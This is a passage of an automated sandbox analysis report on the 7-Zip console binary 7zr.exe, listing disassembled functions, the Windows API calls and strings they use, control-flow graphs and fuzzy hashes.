                            • Opcode Fuzzy Hash: 3d681595eea76eaf9d4190580c9317161652acb840d4c587211e65f4c21f1f59
                            • Instruction Fuzzy Hash: 8E01E2B6911708AFDB04AFA0DC46CEEBB79FB09700B14041AF601A23A2DA759848CB30
                            Function 00CC1858 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 213COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC185D
                              • Part of subcall function 00CC021A: __EH_prolog.LIBCMT ref: 00CC021F
                              • Part of subcall function 00CC062E: __EH_prolog.LIBCMT ref: 00CC0633
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CC1961
                              • Part of subcall function 00CC1AA5: __EH_prolog.LIBCMT ref: 00CC1AAA
                            Strings
                            • Duplicate archive path:, xrefs: 00CC1A8D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID: Duplicate archive path:
                            • API String ID: 2366012087-4000988232
                            • Opcode ID: 4e89ee6f60b46ca54538a7fb7b4351fb78ee915b40372ae954603904195f6b92
                            • Instruction ID: 9c5055e107639acda2bf4380fba8e1cb249b516657713c848350e1ffc7b58fa4
                            • Opcode Fuzzy Hash: 4e89ee6f60b46ca54538a7fb7b4351fb78ee915b40372ae954603904195f6b92
                            • Instruction Fuzzy Hash: C0816935D00159DFCF15EFA5D891EDDBBB5AF19310F1440AEE912A32A2DB30AE05EB60
                            Function 00CEF1B2 Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1520 cef1b2-cef1ce call d3fb10 call cb1168 1524 cef1d3-cef1d5 1520->1524 1525 cef36a-cef378 1524->1525 1526 cef1db-cef1e4 call cef3e4 1524->1526 1529 cef1ed-cef1f2 1526->1529 1530 cef1e6-cef1e8 1526->1530 1531 cef1f4-cef1f9 1529->1531 1532 cef203-cef21a 1529->1532 1530->1525 1531->1532 1533 cef1fb-cef1fe 1531->1533 1535 cef21c-cef22c _CxxThrowException 1532->1535 1536 cef231-cef248 memcpy 1532->1536 1533->1525 1535->1536 1537 cef24c-cef257 1536->1537 1538 cef25c-cef25e 1537->1538 1539 cef259 1537->1539 1540 cef260-cef26f 1538->1540 1541 cef281-cef299 1538->1541 1539->1538 1542 cef279-cef27b 1540->1542 1543 cef271 1540->1543 1549 cef29b-cef2a0 1541->1549 1550 cef311-cef313 1541->1550 1542->1541 1546 cef315-cef318 1542->1546 1544 cef277 1543->1544 1545 cef273-cef275 1543->1545 1544->1542 1545->1542 1545->1544 1548 cef357-cef368 1546->1548 1548->1525 1549->1546 1551 cef2a2-cef2b5 call cef37b 1549->1551 1550->1548 1555 cef2b7-cef2cf call d3e1a0 1551->1555 1556 cef2f0-cef30c memmove 1551->1556 1559 cef31a-cef355 memcpy 1555->1559 1560 cef2d1-cef2eb call cef37b 1555->1560 1556->1537 1559->1548 1560->1555 1564 cef2ed 1560->1564 1564->1556
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 68e89ac230ff1c5c3eea434d3b3875357c20ec3750a1a4e98484fc30b41867f5
                            • Instruction ID: d412090b33da843086a5bfbf7196b9d201685518b12ed725f40ab13c8f8b01db
                            • Opcode Fuzzy Hash: 68e89ac230ff1c5c3eea434d3b3875357c20ec3750a1a4e98484fc30b41867f5
                            • Instruction Fuzzy Hash: 57517076A003499FDB10DFA6C8C5BBEB3B5FF88354F14842DE911AB251D774AA068B60
                            Function 00CA6C72 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 398COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1565 ca6c72-ca6c8e call d3fb10 1568 ca6c90-ca6c94 1565->1568 1569 ca6c96-ca6c9e 1565->1569 1568->1569 1570 ca6cd3-ca6cdc call ca8664 1568->1570 1571 ca6ca0-ca6ca4 1569->1571 1572 ca6ca6-ca6cae 1569->1572 1578 ca6ce2-ca6d02 call ca67f0 call ca2f88 call ca87df 1570->1578 1579 ca6d87-ca6d92 call ca88c6 1570->1579 1571->1570 1571->1572 1572->1570 1573 ca6cb0-ca6cb5 1572->1573 1573->1570 1575 ca6cb7-ca6cce call ca67f0 call ca2f88 1573->1575 1592 ca715d-ca715f 1575->1592 1603 ca6d4a-ca6d61 call ca7b41 1578->1603 1604 ca6d04-ca6d09 1578->1604 1587 ca6d98-ca6d9e 1579->1587 1588 ca6f4c-ca6f62 call ca87fa 1579->1588 1587->1588 1591 ca6da4-ca6dc7 call ca2e47 * 2 1587->1591 1598 ca6f67-ca6f74 call ca85e2 1588->1598 1599 ca6f64-ca6f66 1588->1599 1614 ca6dc9-ca6dcf 1591->1614 1615 ca6dd4-ca6dda 1591->1615 1595 ca7118-ca7126 1592->1595 1610 ca6fd1-ca6fd8 1598->1610 1611 ca6f76-ca6f7c 1598->1611 1599->1598 1622 ca6d63-ca6d65 1603->1622 1623 ca6d67-ca6d6b 1603->1623 1604->1603 1607 ca6d0b-ca6d38 call ca9252 1604->1607 1607->1603 1632 ca6d3a-ca6d45 1607->1632 1618 ca6fda-ca6fde 1610->1618 1619 ca6fe4-ca6feb 1610->1619 1611->1610 1620 ca6f7e-ca6f8a call ca6bf5 1611->1620 1614->1615 1616 ca6ddc-ca6def call ca2407 1615->1616 1617 ca6df1-ca6df9 call ca3221 1615->1617 1616->1617 1636 ca6dfe-ca6e0b call ca87df 1616->1636 1617->1636 1618->1619 1628 ca70e5-ca70ea call ca6868 1618->1628 1629 ca701d-ca7024 call ca8782 1619->1629 1630 ca6fed-ca6ff7 call ca6bf5 1619->1630 1620->1628 1644 ca6f90-ca6f93 1620->1644 1633 ca6d7a-ca6d82 call ca764c 1622->1633 1624 ca6d78 1623->1624 1625 ca6d6d-ca6d75 1623->1625 1624->1633 1625->1624 1646 ca70ef-ca70f3 1628->1646 1629->1628 1653 ca702a-ca7035 1629->1653 1630->1628 1651 ca6ffd-ca7000 1630->1651 1632->1592 1649 ca7116 1633->1649 1657 ca6e0d-ca6e10 1636->1657 1658 ca6e43-ca6e50 call ca6c72 1636->1658 1644->1628 1652 ca6f99-ca6fb6 call ca67f0 call ca2f88 1644->1652 1647 ca710c 1646->1647 1648 ca70f5-ca70f7 1646->1648 1656 ca710e-ca7111 call ca6848 1647->1656 1648->1647 1655 ca70f9-ca7102 1648->1655 1649->1595 1651->1628 1659 ca7006-ca701b call ca67f0 1651->1659 1686 ca6fb8-ca6fbd 1652->1686 1687 ca6fc2-ca6fc5 call ca717b 1652->1687 1653->1628 1654 ca703b-ca7044 call ca8578 1653->1654 1654->1628 1676 ca704a-ca7054 call ca717b 1654->1676 1655->1647 1662 ca7104-ca7107 call ca717b 1655->1662 1656->1649 1665 ca6e1e-ca6e36 call ca67f0 1657->1665 1666 ca6e12-ca6e15 1657->1666 1677 ca6f3a-ca6f4b call ca1e40 * 2 1658->1677 1678 ca6e56 1658->1678 1679 ca6fca-ca6fcc 1659->1679 1662->1647 1683 ca6e58-ca6e7e call ca2f1c call ca2e04 1665->1683 1685 ca6e38-ca6e41 call ca2fec 1665->1685 1666->1658 1672 ca6e17-ca6e1c 1666->1672 1672->1658 1672->1665 1694 ca7056-ca705f call ca2f88 1676->1694 1695 ca7064-ca7097 call ca2e47 call ca1089 * 2 call ca6868 1676->1695 1677->1588 1678->1683 1679->1656 1703 ca6e83-ca6e99 call ca6bb5 1683->1703 1685->1683 1686->1687 1687->1679 1705 ca7155-ca7158 call ca6848 1694->1705 1727 ca7099-ca70af wcscmp 1695->1727 1728 ca70bf-ca70cc call ca6bf5 1695->1728 1711 ca6e9b-ca6e9f 1703->1711 1712 ca6ecf-ca6ed1 1703->1712 1705->1592 1715 ca6ea1-ca6eae call ca22bf 1711->1715 1716 ca6ec7-ca6ec9 SetLastError 1711->1716 1714 ca6f09-ca6f35 call ca1e40 * 2 call ca6848 call ca1e40 * 2 1712->1714 1714->1649 1725 ca6ed3-ca6ed9 1715->1725 1726 ca6eb0-ca6ec5 call ca1e40 call ca2e04 1715->1726 1716->1712 1734 ca6edb-ca6ee0 1725->1734 1735 ca6eec-ca6f07 call ca31e5 1725->1735 1726->1703 1731 ca70bb 1727->1731 1732 ca70b1-ca70b6 1727->1732 1745 ca7129-ca7133 call ca67f0 1728->1745 1746 ca70ce-ca70d1 1728->1746 1731->1728 1738 ca7147-ca7154 call ca2f88 call ca1e40 1732->1738 1734->1735 1740 ca6ee2-ca6ee8 1734->1740 1735->1714 1738->1705 1740->1735 1761 ca713a 1745->1761 1762 ca7135-ca7138 1745->1762 1751 ca70d8-ca70e4 call ca1e40 1746->1751 1752 ca70d3-ca70d6 1746->1752 1751->1628 1752->1745 1752->1751 1764 ca7141-ca7144 1761->1764 1762->1764 1764->1738
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA6C77
                            • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00CA6EC9
                              • Part of subcall function 00CA6C72: wcscmp.MSVCRT ref: 00CA70A5
                              • Part of subcall function 00CA6BF5: __EH_prolog.LIBCMT ref: 00CA6BFA
                              • Part of subcall function 00CA6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00CA6C1A
                              • Part of subcall function 00CA6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00CA6C49
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                            • String ID: :$DATA
                            • API String ID: 3316598575-2587938151
                            • Opcode ID: 6fa7cc6cea27ad903b1fa3b80b61ca00d2b023a347abcaf3428d24d5016076d4
                            • Instruction ID: 500d07d5e0def8076e4e8f100fe65767ab676e99715ea857401b77e31321a033
                            • Opcode Fuzzy Hash: 6fa7cc6cea27ad903b1fa3b80b61ca00d2b023a347abcaf3428d24d5016076d4
                            • Instruction Fuzzy Hash: 05E1043090020B9ACF25EFA4C895BEEB7B1FF1731CF184519E866672D1DB716A49DB10
                            Function 00CB6FC5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB6FCA
                              • Part of subcall function 00CB6E71: __EH_prolog.LIBCMT ref: 00CB6E76
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                            • API String ID: 3519838083-394804653
                            • Opcode ID: a4259277c80d0842ae5702d288e539b035122641ec16431653b31231dbac1d12
                            • Instruction ID: 5a140560ad96eade568b78257e1210a95a73585e0b1d4a3771d5d8929bf90b88
                            • Opcode Fuzzy Hash: a4259277c80d0842ae5702d288e539b035122641ec16431653b31231dbac1d12
                            • Instruction Fuzzy Hash: 2741A4729092849FCF21EFA9C4909EEFBF5AF99300F58456FE896A3201C6316F44C761
                            Function 00CD84A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: 1a7867ed9436b5dee13a1b0cbf8ca21cd0f80d0c5ee54d6c8936546580c65ba7
                            • Instruction ID: 8aed857617441d7a07a32c34ce8d28d30d84040f9c5207da733eb1e86e66b0a9
                            • Opcode Fuzzy Hash: 1a7867ed9436b5dee13a1b0cbf8ca21cd0f80d0c5ee54d6c8936546580c65ba7
                            • Instruction Fuzzy Hash: 46218E32904119AFCF05EB94E946BEDBBB5EF45314F24002BE801722A1EF716E44EBA1
                            Function 00CD8341 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD8346
                            • fputs.MSVCRT ref: 00CD835B
                            • fputs.MSVCRT ref: 00CD8364
                              • Part of subcall function 00CD83BF: __EH_prolog.LIBCMT ref: 00CD83C4
                              • Part of subcall function 00CD83BF: fputs.MSVCRT ref: 00CD8401
                              • Part of subcall function 00CD83BF: fputs.MSVCRT ref: 00CD8437
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: eb0d756b8f7f0a945e274a92da43e326640ad3d16788c90937e530df83b4d2d2
                            • Instruction ID: cbfd76a25eb89d6428baa793e40d3ffa69f44c3f342f8148cd6ca1e6f8ea4231
                            • Opcode Fuzzy Hash: eb0d756b8f7f0a945e274a92da43e326640ad3d16788c90937e530df83b4d2d2
                            • Instruction Fuzzy Hash: B501F931A00109AFCF05BFA9CC12AEDBF75EF85714F00401AF905922A1CF754A45EBE1
                            Function 00D37DA0 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,00CBAB57), ref: 00D37DAA
                            • GetLastError.KERNEL32(?,00000000,00CBAB57), ref: 00D37DBB
                            • CloseHandle.KERNELBASE(00000000,?,00000000,00CBAB57), ref: 00D37DCF
                            • GetLastError.KERNEL32(?,00000000,00CBAB57), ref: 00D37DD9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$CloseHandleObjectSingleWait
                            • String ID:
                            • API String ID: 1796208289-0
                            • Opcode ID: 53980a36f97a0497920ebe3b2fbad877239f0a1257079eb0af2a42e9de1eeea6
                            • Instruction ID: 34f130bf508347090939ee6eec133ed630b0d6b886dc2c8001e30549e54a176a
                            • Opcode Fuzzy Hash: 53980a36f97a0497920ebe3b2fbad877239f0a1257079eb0af2a42e9de1eeea6
                            • Instruction Fuzzy Hash: A4F0FEB130DA02C7EB705EBDBC84B3666D8AF523B4F280725E561D26D0EA64CC409630
                            Function 00CC2096 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 722COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC209B
                              • Part of subcall function 00CA757D: GetLastError.KERNEL32(00CAD14C), ref: 00CA757D
                              • Part of subcall function 00CC2C6C: __EH_prolog.LIBCMT ref: 00CC2C71
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ErrorLastfree
                            • String ID: Cannot find archive file$The item is a directory
                            • API String ID: 683690243-1569138187
                            • Opcode ID: 5c8f8d5fca69229f47e3a56cd28dd36bfa947fc436b1dee663e1fc2141fe9334
                            • Instruction ID: 03a4cd45607525222ff0db51c02c6c3dfe30a0961d7fea471db078c49d3b930b
                            • Opcode Fuzzy Hash: 5c8f8d5fca69229f47e3a56cd28dd36bfa947fc436b1dee663e1fc2141fe9334
                            • Instruction Fuzzy Hash: 11724674D00259DFCB25DFA8C884BDEBBB5AF49304F14809EE859AB252CB709E81DF51
                            Function 00CDC911 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CountTickfputs
                            • String ID: .
                            • API String ID: 290905099-4150638102
                            • Opcode ID: 9e031cafb32726dbdda8eddaf2bbf1a6bb4bce3b0115b2c5f248badf7ae63189
                            • Instruction ID: b7763a66a90d0ef4639feebc8c07308ee164a787429a20d518b5ff13ec230d7e
                            • Opcode Fuzzy Hash: 9e031cafb32726dbdda8eddaf2bbf1a6bb4bce3b0115b2c5f248badf7ae63189
                            • Instruction Fuzzy Hash: F8716B31600B069FCB25EF68C4D1AAAB7F6AF82304F00481EE59787681DB74FA45DB11
                            Function 00CE08B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CA9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CA9CB3
                              • Part of subcall function 00CA9C8F: GetProcAddress.KERNEL32(00000000), ref: 00CA9CBA
                              • Part of subcall function 00CA9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CA9CC8
                            • __aulldiv.LIBCMT ref: 00CE093F
                            • __aulldiv.LIBCMT ref: 00CE094B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                            • String ID: 3333
                            • API String ID: 3520896023-2924271548
                            • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction ID: e2fbfd071cc27e5f3019863ec31c6292bd2457deea7e5c0f0e05f88193b690a1
                            • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction Fuzzy Hash: 4A21B5B1D007486FE730DF6B8881A5BBAF9EB84711F14892EB186D3242D670A9408BB5
                            Function 00CCA7C5 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 606COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            • memset.MSVCRT ref: 00CCAEBA
                            • memset.MSVCRT ref: 00CCAECD
                              • Part of subcall function 00CE04D2: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CE04F8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memset$ExceptionThrowfree
                            • String ID: Split
                            • API String ID: 1404239998-1882502421
                            • Opcode ID: bd5f8815bfa6d9698af5465081e63cf11493419951396f14ef7f9608ef448214
                            • Instruction ID: ecc44621da30c5ec969e7f5a102e74598c896530bf678d760b8c1dfc40dc64dc
                            • Opcode Fuzzy Hash: bd5f8815bfa6d9698af5465081e63cf11493419951396f14ef7f9608ef448214
                            • Instruction Fuzzy Hash: 96423A30A00249DFDF25DBA5C998FADBBB1BF05308F1440ADE849A7251CB71AE85DF52
                            Function 00CA759A Relevance: 4.6, APIs: 3, Instructions: 64fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA759F
                              • Part of subcall function 00CA764C: CloseHandle.KERNELBASE(00000000,?,00CA75AF,00000002,?,00000000,00000000), ref: 00CA7657
                            • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 00CA75E5
                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00CA7626
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CreateFile$CloseH_prologHandle
                            • String ID:
                            • API String ID: 449569272-0
                            • Opcode ID: 38cde00478bd3ee6db1f1e4e4372ef7d72747767d86579d9919ac7b79e8fe125
                            • Instruction ID: 78a3cba1850c4bab7e137974dbdd3a4200aacf179d343bd2bb4c0c4d24b7165a
                            • Opcode Fuzzy Hash: 38cde00478bd3ee6db1f1e4e4372ef7d72747767d86579d9919ac7b79e8fe125
                            • Instruction Fuzzy Hash: 4D11847280020BEFCF119FA4DC409EEBB7AFF15358F108629F960561A1C7719E65EB50
                            Function 00CD83BF Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • fputs.MSVCRT ref: 00CD8437
                            • fputs.MSVCRT ref: 00CD8401
                              • Part of subcall function 00CA1FB3: __EH_prolog.LIBCMT ref: 00CA1FB8
                            • __EH_prolog.LIBCMT ref: 00CD83C4
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputs$fputc
                            • String ID:
                            • API String ID: 678540050-0
                            • Opcode ID: ad90fcae5297c94d8b661b2de6b462ec361ad8a39231599c60f68dfe05a12c12
                            • Instruction ID: e7d7d90b58e17ff06d8f0917856a62feadc7b8939d26081576ff5ae1955ac36b
                            • Opcode Fuzzy Hash: ad90fcae5297c94d8b661b2de6b462ec361ad8a39231599c60f68dfe05a12c12
                            • Instruction Fuzzy Hash: A5118635B0411A5FCF09BBE5DC239AEBBA5DF41754F00002AF90192291DF655949AAE4
                            Function 00CA7731 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,00CA77DB,?,?,00000000,?,00CA7832,?), ref: 00CA7773
                            • GetLastError.KERNEL32(?,00CA77DB,?,?,00000000,?,00CA7832,?,?,?,?,00000000), ref: 00CA7780
